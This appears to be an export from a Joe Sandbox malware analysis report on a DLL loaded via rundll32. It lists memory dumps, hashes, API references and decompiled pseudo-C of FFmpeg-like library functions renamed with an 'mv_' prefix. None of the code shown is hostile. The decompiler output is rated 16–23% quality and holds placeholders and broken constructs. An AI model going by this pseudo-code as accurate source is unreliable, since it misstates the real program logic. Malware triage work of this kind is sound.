Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_bprintf
String ID: @%s$NONE
API String ID: 3083893021-9228147
Opcode ID: 79dbcbfc88ece960a6534e3f0ca092c78e639d7c6172cd214de36e0c89aebf28
Instruction ID: 70331aafde610822ed2af80890897691dd53c5944589bad81a8dad7e52305c51
Opcode Fuzzy Hash: 79dbcbfc88ece960a6534e3f0ca092c78e639d7c6172cd214de36e0c89aebf28
Instruction Fuzzy Hash: 65114C71909B5A8BE720EF18C58016EF7E1FB443D4F55881EE889A7219D731EC94CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 100194D1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 100194D8
mv_strerror.MAIN ref: 100194FE

Part of subcall function 10013B30: mv_strlcpy.MAIN ref: 10013B71

mv_log.MAIN ref: 1001951B
_close.MSVCRT ref: 10019523

Strings

Error occurred in fstat(): %s, xrefs: 1001950B

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: _close_errnomv_logmv_strerrormv_strlcpy
String ID: Error occurred in fstat(): %s
API String ID: 1199337903-68092211
Opcode ID: fe60c93a3a69f3fb052d7518d5be4b5d53371f27e76a69ea24f993d483ec9b6c
Instruction ID: 16cc7446d487878674d3b6b426b97f2481dfa04c85c7ba054179e642ea7d2528
Opcode Fuzzy Hash: fe60c93a3a69f3fb052d7518d5be4b5d53371f27e76a69ea24f993d483ec9b6c
Instruction Fuzzy Hash: D5F092B48097159FC310EF14C48425AFBE4FF84700F41C82EE5D99B361DBB4A9859B82

Uniqueness

Uniqueness Score: -1.00%

Function 100261E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 18COMMON

Download Yara Rule

APIs

mv_log.MAIN ref: 10026214
abort.MSVCRT ref: 10026219

Strings

libavutil/mem.c, xrefs: 100261F1
val || !min_size, xrefs: 100261FA
Assertion %s failed at %s:%d, xrefs: 100261EC

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: abortmv_log
String ID: Assertion %s failed at %s:%d$libavutil/mem.c$val || !min_size
API String ID: 2075109169-2043513658
Opcode ID: 8f81f5fb1eb81c7ff482c4753d8fd96b33f37a0bbede6ecb2a8b2548e6ea380c
Instruction ID: 92dcbfe9e1960efb2ab07aa63a33d773c6a90460a03fc24632acdcdda2ae59c7
Opcode Fuzzy Hash: 8f81f5fb1eb81c7ff482c4753d8fd96b33f37a0bbede6ecb2a8b2548e6ea380c
Instruction Fuzzy Hash: 3CE092B8A093449FC344DF299141A0ABBE0EB88B00F51C82EF98CC7349E738D844AB56

Uniqueness

Uniqueness Score: -1.00%

Function 1008E410 Relevance: 7.7, APIs: 5, Instructions: 226
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E1008E410(signed int __eax) {
				void* _v16;
				char _v32;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* _v57;
				signed char _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _t57;
				void* _t63;
				int _t69;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t79;
				signed int _t84;
				signed int _t91;
				struct _CRITICAL_SECTION* _t93;
				signed int _t95;
				intOrPtr* _t96;
				signed int _t99;
				signed int _t100;
				signed int _t101;
				signed int _t103;
				signed int _t106;
				signed int _t108;
				struct _CRITICAL_SECTION _t109;
				signed int _t111;
				signed char _t113;
				signed int _t115;
				signed int _t116;
				void* _t117;
				void* _t122;
				void* _t123;
				char** _t124;
				signed int* _t127;
				signed int* _t128;

				_t57 = __eax;
				_t123 = _t122 - 0x4c;
				_t108 =  *0x101d66e0;
				if(_t108 == 0) {
					 *0x101d66e0 = 1;
					_t63 = L1008ED80(0x1b + (L1008EB20() + _t58 * 4) * 4 >> 4 << 4);
					 *0x101d66e4 = 0;
					_t124 = _t123 - _t63;
					 *0x101d66e8 =  &_v57 & 0xfffffff0;
					_t57 = 0;
					__eflags = 0x100c637c - 7;
					if(0x100c637c <= 7) {
						goto L1;
					} else {
						_t103 =  *0x100c637c; // 0x0
						__eflags = 0x100c637c - 0xb;
						if(0x100c637c > 0xb) {
							L16:
							__eflags = _t103;
							if(_t103 != 0) {
								_t93 = 0x100c637c;
								goto L43;
							} else {
								_t71 =  *0x100c6380; // 0x0
								_t93 = 0x100c6388;
								__eflags = _t71 |  *0x100c6384;
								if((_t71 |  *0x100c6384) == 0) {
									goto L5;
								} else {
									_t93 = 0x100c637c;
									goto L7;
								}
							}
						} else {
							_t93 = 0x100c637c;
							L5:
							_t57 =  *_t93;
							__eflags = _t57;
							if(_t57 != 0) {
								L43:
								__eflags = _t93 - 0x100c637c;
								if(_t93 >= 0x100c637c) {
									goto L1;
								} else {
									_v48 = _t108;
									do {
										_t49 = _t93 + 4; // 0x0
										_t114 =  *_t49;
										_t109 =  *_t93;
										_t93 = _t93 + 8;
										_t50 = _t114 + 0x10000000; // 0x905a4d
										_t51 = _t114 + 0x10000000; // 0x10000000
										_t57 = E1008E2B0(_t51);
										 *((intOrPtr*)( *_t49 + 0x10000000)) = _t109 +  *_t50;
										__eflags = _t93 - 0x100c637c;
									} while (_t93 < 0x100c637c);
									_t111 = _v48;
									goto L29;
								}
							} else {
								_t7 = _t93 + 4; // 0x0
								_t57 =  *_t7;
								L7:
								__eflags = _t57;
								if(_t57 != 0) {
									goto L43;
								} else {
									_t8 = _t93 + 8; // 0x0
									_t57 =  *_t8;
									__eflags = _t57 - 1;
									if(__eflags != 0) {
										_v88 = _t57;
										 *_t124 = "  Unknown pseudo relocation protocol version %d.\n";
										_t72 = E1008E250(__eflags);
										_push(_t108);
										_push(_t113);
										_t127 = _t124 - 0x1c;
										 *_t127 = 0x101d66f4;
										EnterCriticalSection(_t93);
										_t95 =  *0x101d66ec;
										_t128 = _t127 - 4;
										__eflags = _t95;
										while(_t95 != 0) {
											 *_t128 =  *_t95;
											_t74 = TlsGetValue(??);
											_t128 = _t128 - 4;
											_t116 = _t74;
											_t72 = GetLastError();
											__eflags = _t72;
											if(_t72 == 0) {
												__eflags = _t116;
												if(_t116 != 0) {
													 *_t128 = _t116;
													_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t95 + 4))))();
												}
											}
											_t95 =  *(_t95 + 8);
											__eflags = _t95;
										}
										 *_t128 = 0x101d66f4;
										LeaveCriticalSection(??);
										return _t72;
									} else {
										_t96 = _t93 + 0xc;
										__eflags = _t96 - 0x100c637c;
										if(_t96 >= 0x100c637c) {
											goto L1;
										} else {
											_v56 = _t108;
											do {
												_t10 = _t96 + 4; // 0x2e322e32
												_t108 =  *_t10;
												_t11 = _t96 + 8; // 0x30
												_t99 =  *_t11;
												_t12 = _t108 + 0x10000000; // 0x3e322e32
												_t103 = _t99 & 0x000000ff;
												_v52 = _t12;
												_t14 =  *_t96 + 0x10000000; // 0x4e322e32
												_t117 = _t14;
												_v48 =  *((intOrPtr*)( *_t96 + 0x10000000));
												__eflags = _t99 - 0x10;
												if(_t99 == 0x10) {
													L21:
													_t26 = _t108 + 0x10000000; // 0x905a4d
													_t79 =  *_t26 & 0x0000ffff;
													_t100 = _t99 & 0x000000e0;
													__eflags = _t79;
													if(_t79 < 0) {
														_t79 = _t79 | 0xffff0000;
														__eflags = _t79;
													}
													_t113 = _v48 + _t79 - _t117;
													__eflags = _t100;
													if(_t100 != 0) {
														L26:
														_t57 = E1008E2B0(_v52);
														 *(_t108 + 0x10000000) = _t113;
														goto L27;
													} else {
														__eflags = _t113 - 0xffff8000;
														if(__eflags < 0) {
															goto L15;
														} else {
															__eflags = _t113 - 0xffff;
															if(__eflags > 0) {
																goto L15;
															} else {
																goto L26;
															}
														}
													}
												} else {
													__eflags = _t103 - 0x20;
													if(_t103 != 0x20) {
														__eflags = _t103 - 8;
														if(__eflags == 0) {
															_t84 =  *(_t108 + 0x10000000) & 0x000000ff;
															_t101 = _t99 & 0x000000e0;
															__eflags = _t84;
															if(_t84 < 0) {
																_t84 = _t84 | 0xffffff00;
																__eflags = _t84;
															}
															_t113 = _v48 + _t84 - _t117;
															__eflags = _t101;
															if(_t101 != 0) {
																L40:
																E1008E2B0(_v52);
																_t57 = _t113;
																 *(_t108 + 0x10000000) = _t57;
																goto L27;
															} else {
																__eflags = _t113 - 0xff;
																if(__eflags > 0) {
																	goto L15;
																} else {
																	__eflags = _t113 - 0xffffff80;
																	if(__eflags < 0) {
																		goto L15;
																	} else {
																		goto L40;
																	}
																}
															}
														} else {
															_v88 = _t103;
															 *_t124 = "  Unknown pseudo relocation bit size %d.\n";
															E1008E250(__eflags);
															goto L21;
														}
													} else {
														_t18 = _t108 + 0x10000000; // 0x905a4d
														_t91 = _v48 - _t117 +  *_t18;
														__eflags = _t99 & 0x000000e0;
														_t113 = _t91;
														if((_t99 & 0x000000e0) != 0) {
															L41:
															_t57 = E1008E2B0(_v52);
															 *(_t108 + 0x10000000) = _t113;
															goto L27;
														} else {
															__eflags = _t91;
															if(__eflags < 0) {
																goto L41;
															} else {
																L15:
																_v76 = _t113;
																_v80 = _v48;
																_v88 = _t103;
																_v84 = _v52;
																 *_t124 = "%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.\n";
																_t57 = E1008E250(__eflags);
																goto L16;
															}
														}
													}
												}
												goto L54;
												L27:
												_t96 = _t96 + 0xc;
												__eflags = _t96 - 0x100c637c;
											} while (_t96 < 0x100c637c);
											_t111 = _v56;
											L29:
											__eflags =  *0x101d66e4;
											if( *0x101d66e4 <= 0) {
												goto L1;
											} else {
												_t115 =  &_v32;
												do {
													_t69 =  *0x101d66e8 + (_t111 + _t111 * 4) * 4;
													_t106 =  *_t69;
													__eflags = _t106;
													if(_t106 != 0) {
														_v80 = _t115;
														_v84 = _t106;
														_v88 =  *(_t69 + 8);
														 *_t124 =  *(_t69 + 4);
														_t69 = VirtualProtect(??, ??, ??, ??);
														_t124 = _t124 - 0x10;
													}
													_t111 = _t111 + 1;
													__eflags = _t111 -  *0x101d66e4;
												} while (_t111 <  *0x101d66e4);
												return _t69;
											}
										}
									}
								}
							}
						}
					}
				} else {
					L1:
					return _t57;
				}
				L54:
			}

0x1008e410
0x1008e416
0x1008e419
0x1008e421
0x1008e430
0x1008e44f
0x1008e454
0x1008e45e
0x1008e467
0x1008e471
0x1008e476
0x1008e479
0x00000000
0x1008e47b
0x1008e47b
0x1008e481
0x1008e484
0x1008e540
0x1008e540
0x1008e542
0x1008e6b8
0x00000000
0x1008e548
0x1008e548
0x1008e54d
0x1008e554
0x1008e55a
0x00000000
0x1008e560
0x1008e560
0x00000000
0x1008e560
0x1008e55a
0x1008e48a
0x1008e48a
0x1008e48f
0x1008e48f
0x1008e491
0x1008e493
0x1008e6bd
0x1008e6bd
0x1008e6c3
0x00000000
0x1008e6c9
0x1008e6c9
0x1008e6d0
0x1008e6d0
0x1008e6d0
0x1008e6d3
0x1008e6d5
0x1008e6d8
0x1008e6de
0x1008e6e4
0x1008e6e9
0x1008e6ef
0x1008e6ef
0x1008e6f7
0x00000000
0x1008e6f7
0x1008e499
0x1008e499
0x1008e499
0x1008e49c
0x1008e49c
0x1008e49e
0x00000000
0x1008e4a4
0x1008e4a4
0x1008e4a4
0x1008e4a7
0x1008e4aa
0x1008e6ff
0x1008e703
0x1008e70a
0x1008e711
0x1008e712
0x1008e714
0x1008e717
0x1008e71e
0x1008e724
0x1008e72a
0x1008e72d
0x1008e72f
0x1008e742
0x1008e745
0x1008e747
0x1008e74a
0x1008e74c
0x1008e74e
0x1008e750
0x1008e752
0x1008e754
0x1008e759
0x1008e75c
0x1008e75c
0x1008e754
0x1008e75e
0x1008e761
0x1008e761
0x1008e765
0x1008e76c
0x1008e77c
0x1008e4b0
0x1008e4b0
0x1008e4b3
0x1008e4b9
0x00000000
0x1008e4bf
0x1008e4bf
0x1008e4c8
0x1008e4c8
0x1008e4c8
0x1008e4cb
0x1008e4cb
0x1008e4ce
0x1008e4d4
0x1008e4d7
0x1008e4dc
0x1008e4dc
0x1008e4e8
0x1008e4eb
0x1008e4ee
0x1008e590
0x1008e590
0x1008e590
0x1008e597
0x1008e59d
0x1008e5a0
0x1008e5a2
0x1008e5a2
0x1008e5a2
0x1008e5ac
0x1008e5ae
0x1008e5b0
0x1008e5ca
0x1008e5cd
0x1008e5d2
0x00000000
0x1008e5b2
0x1008e5b2
0x1008e5b8
0x00000000
0x1008e5be
0x1008e5be
0x1008e5c4
0x00000000
0x00000000
0x00000000
0x00000000
0x1008e5c4
0x1008e5b8
0x1008e4f4
0x1008e4f4
0x1008e4f7
0x1008e570
0x1008e573
0x1008e650
0x1008e657
0x1008e65d
0x1008e65f
0x1008e661
0x1008e661
0x1008e661
0x1008e66b
0x1008e66d
0x1008e66f
0x1008e686
0x1008e689
0x1008e68e
0x1008e690
0x00000000
0x1008e671
0x1008e671
0x1008e677
0x00000000
0x1008e67d
0x1008e67d
0x1008e680
0x00000000
0x00000000
0x00000000
0x00000000
0x1008e680
0x1008e677
0x1008e579
0x1008e579
0x1008e57d
0x1008e584
0x00000000
0x1008e584
0x1008e4f9
0x1008e4fe
0x1008e4fe
0x1008e504
0x1008e50a
0x1008e50c
0x1008e6a0
0x1008e6a3
0x1008e6a8
0x00000000
0x1008e512
0x1008e512
0x1008e514
0x00000000
0x1008e51a
0x1008e51a
0x1008e51a
0x1008e521
0x1008e528
0x1008e52c
0x1008e530
0x1008e537
0x00000000
0x1008e537
0x1008e514
0x1008e50c
0x1008e4f7
0x00000000
0x1008e5d9
0x1008e5d9
0x1008e5dc
0x1008e5dc
0x1008e5e8
0x1008e5eb
0x1008e5f1
0x1008e5f3
0x00000000
0x1008e5f9
0x1008e5ff
0x1008e608
0x1008e611
0x1008e614
0x1008e616
0x1008e618
0x1008e61a
0x1008e61e
0x1008e625
0x1008e62c
0x1008e62f
0x1008e631
0x1008e631
0x1008e634
0x1008e637
0x1008e637
0x1008e646
0x1008e646
0x1008e5f3
0x1008e4b9
0x1008e4aa
0x1008e49e
0x1008e493
0x1008e484
0x1008e423
0x1008e423
0x1008e42a
0x1008e42a
0x00000000

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55d33e5ae2fdebf123d5d6c44a8726b7159fae46d8a505568c5676af4475ca4e
Instruction ID: 673c3b97693f899d3c2f50e5342af0a7e5fead6986cad9ee1b36c1617013f18f
Opcode Fuzzy Hash: 55d33e5ae2fdebf123d5d6c44a8726b7159fae46d8a505568c5676af4475ca4e
Instruction Fuzzy Hash: 0D917D71E006A68FCB10DF68C98074EB7F4FF88394F46896AE854A7259E734FD508B91

Uniqueness

Uniqueness Score: -1.00%

Function 10007100 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 114stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 10007126
strchr.MSVCRT ref: 1000715B
strncmp.MSVCRT ref: 10007200
strlen.MSVCRT ref: 1000724B

Strings

-, xrefs: 10007232

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: strlen$strchrstrncmp
String ID: -
API String ID: 2264528763-2547889144
Opcode ID: 48f7d506b45c4cfb1b097bd66a56f7f6b4d5827668b9fbc93cb44df58068eac6
Instruction ID: 2e89a320e1afa525ac89b1a85f99ca85d7156f5341a68399cbbe94f8cfb36377
Opcode Fuzzy Hash: 48f7d506b45c4cfb1b097bd66a56f7f6b4d5827668b9fbc93cb44df58068eac6
Instruction Fuzzy Hash: 8C318F75A083918FEB10DA78949025EBBE1FF89284F05492EE9C8D7249E278D906D792

Uniqueness

Uniqueness Score: -1.00%

Function 1001E48C Relevance: 7.6, APIs: 5, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 23%

			E1001E48C(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {

				while(1) {
					__eax = 4[__edx];
					__edx =  &(4[__edx]);
					__eflags = __eax - 0xffffffff;
					if(__eax == 0xffffffff) {
						break;
					}
					__eflags = __eax - __ecx;
					if(__eflags != 0) {
						continue;
					}
					__esp[3] = __esi;
					__eax = 0;
					__esp[2] = 0;
					__eax = __esi[0x30];
					__esp[1] = __esi[0x30];
					__eax = __esi[0x2c];
					 *__esp = __esi[0x2c];
					__eax = E1001F6A0(__ebx, __edx, __edi, __esi, __ebp, __eflags);
					__eflags = __eax;
					__ebx = __eax;
					if(__eax < 0) {
						L2:
						return 0;
					}
					__eax = __esi[4];
					__edx =  *__eax;
					__edx =  *( *__eax + 0x34);
					__eflags = __edx;
					if(__edx == 0) {
						L9:
						__eax = __eax[8];
						__eflags = __eax;
						if(__eax != 0) {
							__ebp = __esi[0x1c];
							__eflags = __esi[0x1c];
							if(__esi[0x1c] == 0) {
								__esi[0x1c] = __eax;
							}
						}
						__edi = __esi[0x20];
						__eflags = __esi[0x20];
						if(__esi[0x20] <= 0) {
							L1:
							goto L2;
						} else {
							__eax = __esp[0x18];
							__ebx = 4;
							__edx = __esp[0x18][4];
							__esp[1] = 4;
							__esp[0xa] = __edx;
							__eax =  *(__edx + 0x20);
							 *__esp =  *(__edx + 0x20);
							__eax = E100266D0();
							__esp[0xf] = __eax;
							__eflags = __eax;
							if(__eax == 0) {
								__ebx = 0xfffffff4;
								L25:
								__eax = __esi[4];
								__eax =  *(__esi[4]);
								__eax = ( *(__esi[4]))[0x38];
								__eflags = __eax;
								if(__eax != 0) {
									 *__esp = __esi;
									__eax =  *__eax();
								}
								goto L2;
							}
							__edx = __esp[0xa];
							__ebx = 0;
							__ebp = 0;
							__ecx =  *(__edx + 0x20);
							__eflags =  *(__edx + 0x20);
							if( *(__edx + 0x20) <= 0) {
								L30:
								__eax =  &(__esp[0xf]);
								__ebx = 0;
								E100265C0( &(__esp[0xf]));
								goto L2;
							}
							__esp[0xb] = __esi;
							__edi = 0;
							__esi = __eax;
							__esp[0xa] = __edx;
							while(1) {
								__eax = L1001AC40(__ebx, __edi, __esi);
								__ebx = __ebp * 4;
								 *__esi = __eax;
								__eax = __esp[0xf];
								__eax = __ebx[__esp[0xf]];
								__eflags = __eax;
								if(__eax == 0) {
									break;
								}
								__esp[1] = __eax;
								__eax = __esp[0x18];
								__edx = 0;
								__esp[2] = 0;
								 *__esp = __esp[0x18];
								__eax = E1001E2F0();
								__eflags = __eax;
								__edi = __eax;
								if(__eax < 0) {
									__edx = __esp[0xa];
									__ebx = __eax;
									__esi = __esp[0xb];
									__eax =  *(__edx + 0x20);
									__eflags =  *(__edx + 0x20);
									if( *(__edx + 0x20) > 0) {
										L22:
										__edi = 0;
										__eflags = 0;
										__ebp = __edx;
										do {
											__esp[0xf] = __esp[0xf] + __edi * 4;
											__edi =  &(__edi[1]);
											__eax = L1001ADB0(__ebx, __eax);
											__eflags = __edi -  *((intOrPtr*)(__ebp + 0x20));
										} while (__edi <  *((intOrPtr*)(__ebp + 0x20)));
										__eax =  &(__esp[0xf]);
										E100265C0( &(__esp[0xf]));
										__eflags = __ebx;
										if(__ebx >= 0) {
											goto L1;
										}
										goto L25;
									}
									__eax =  &(__esp[0xf]);
									E100265C0( &(__esp[0xf]));
									goto L25;
								}
								__eax = __esp[0xa];
								__ebp = __ebp + 1;
								__eax = __esp[0xa][0x20];
								__eflags = __ebp - __eax;
								if(__ebp >= __eax) {
									__esi = __esp[0xb];
									__ebx = __edi;
									__edx = __esp[0xa];
									L21:
									__eflags = __eax;
									if(__eax <= 0) {
										goto L30;
									}
									goto L22;
								}
								__esi = __esp[0xf];
							}
							__edx = __esp[0xa];
							__ebx = __edi;
							__esi = __esp[0xb];
							__eax =  *(__edx + 0x20);
							goto L21;
						}
					}
					 *__esp = __esi;
					__eax =  *__edx();
					__eflags = __eax;
					__ebx = __eax;
					if(__eax < 0) {
						goto L25;
					} else {
						__eax = __esi[4];
						goto L9;
					}
				}
				__ebx = __ebx[4];
				__eax = L10031930(__ecx);
				 *__esp = __esi;
				__esp[4] = __ebx;
				__ebx = 0xffffffd8;
				__esp[3] = __eax;
				__eax = "The hardware pixel format \'%s\' is not supported by the device type \'%s\'\n";
				__esp[2] = "The hardware pixel format \'%s\' is not supported by the device type \'%s\'\n";
				__eax = 0x10;
				__esp[1] = 0x10;
				__eax = L10023A40();
				goto L2;
			}

0x1001e490
0x1001e490
0x1001e493
0x1001e496
0x1001e499
0x00000000
0x00000000
0x1001e49f
0x1001e4a1
0x00000000
0x00000000
0x1001e4a3
0x1001e4a7
0x1001e4a9
0x1001e4ad
0x1001e4b0
0x1001e4b4
0x1001e4b7
0x1001e4ba
0x1001e4bf
0x1001e4c1
0x1001e4c3
0x1001e46a
0x1001e473
0x1001e473
0x1001e4c5
0x1001e4c8
0x1001e4ca
0x1001e4cd
0x1001e4cf
0x1001e4e3
0x1001e4e3
0x1001e4e6
0x1001e4e8
0x1001e4ea
0x1001e4ed
0x1001e4ef
0x1001e4f1
0x1001e4f1
0x1001e4ef
0x1001e4f4
0x1001e4f7
0x1001e4f9
0x1001e468
0x00000000
0x1001e4ff
0x1001e4ff
0x1001e503
0x1001e508
0x1001e50b
0x1001e50f
0x1001e513
0x1001e516
0x1001e519
0x1001e51e
0x1001e522
0x1001e524
0x1001e67f
0x1001e5e9
0x1001e5e9
0x1001e5ec
0x1001e5ee
0x1001e5f1
0x1001e5f3
0x1001e5f9
0x1001e5fc
0x1001e5fc
0x00000000
0x1001e5f3
0x1001e52a
0x1001e52e
0x1001e530
0x1001e532
0x1001e535
0x1001e537
0x1001e631
0x1001e631
0x1001e635
0x1001e63a
0x00000000
0x1001e63a
0x1001e53d
0x1001e541
0x1001e543
0x1001e545
0x1001e584
0x1001e584
0x1001e589
0x1001e592
0x1001e594
0x1001e598
0x1001e59b
0x1001e59d
0x00000000
0x00000000
0x1001e550
0x1001e554
0x1001e558
0x1001e55a
0x1001e55e
0x1001e561
0x1001e566
0x1001e568
0x1001e56a
0x1001e603
0x1001e607
0x1001e609
0x1001e60d
0x1001e610
0x1001e612
0x1001e5b4
0x1001e5b4
0x1001e5b4
0x1001e5b6
0x1001e5c0
0x1001e5c4
0x1001e5c7
0x1001e5cb
0x1001e5d0
0x1001e5d0
0x1001e5d5
0x1001e5dc
0x1001e5e1
0x1001e5e3
0x00000000
0x00000000
0x00000000
0x1001e5e3
0x1001e614
0x1001e61b
0x00000000
0x1001e61b
0x1001e570
0x1001e574
0x1001e575
0x1001e578
0x1001e57a
0x1001e622
0x1001e626
0x1001e628
0x1001e5ac
0x1001e5ac
0x1001e5ae
0x00000000
0x00000000
0x00000000
0x1001e5ae
0x1001e580
0x1001e580
0x1001e59f
0x1001e5a3
0x1001e5a5
0x1001e5a9
0x00000000
0x1001e5a9
0x1001e4f9
0x1001e4d1
0x1001e4d4
0x1001e4d6
0x1001e4d8
0x1001e4da
0x00000000
0x1001e4e0
0x1001e4e0
0x00000000
0x1001e4e0
0x1001e4da
0x1001e648
0x1001e64e
0x1001e653
0x1001e656
0x1001e65a
0x1001e65f
0x1001e663
0x1001e668
0x1001e66c
0x1001e671
0x1001e675
0x00000000

APIs

mv_image_check_size.MAIN ref: 1001E4BA
mv_calloc.MAIN ref: 1001E519
mv_frame_alloc.MAIN ref: 1001E584
mv_frame_free.MAIN ref: 1001E5CB
mv_freep.MAIN ref: 1001E5DC
mv_get_pix_fmt_name.MAIN ref: 1001E64E
mv_log.MAIN ref: 1001E675

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_callocmv_frame_allocmv_frame_freemv_freepmv_get_pix_fmt_namemv_image_check_sizemv_log
String ID:
API String ID: 473889652-0
Opcode ID: 9fa864ee1928c6bd1dd4db397f2e61f531e39c49d346cdfc62535eb3725c1c8c
Instruction ID: f0d2ef2185eafc4a44fc2f14c59591e06059a7926607cfdcd1216548b2331345
Opcode Fuzzy Hash: 9fa864ee1928c6bd1dd4db397f2e61f531e39c49d346cdfc62535eb3725c1c8c
Instruction Fuzzy Hash: C841E274604B828FD750DF69C480A0AF7E5FF88754F56892DE999DB321E770EC818B81

Uniqueness

Uniqueness Score: -1.00%

Function 1001E689 Relevance: 7.6, APIs: 5, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E1001E689(intOrPtr __ebx, signed int __ecx, intOrPtr __edi, intOrPtr __esi, intOrPtr __ebp, signed int* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v32;
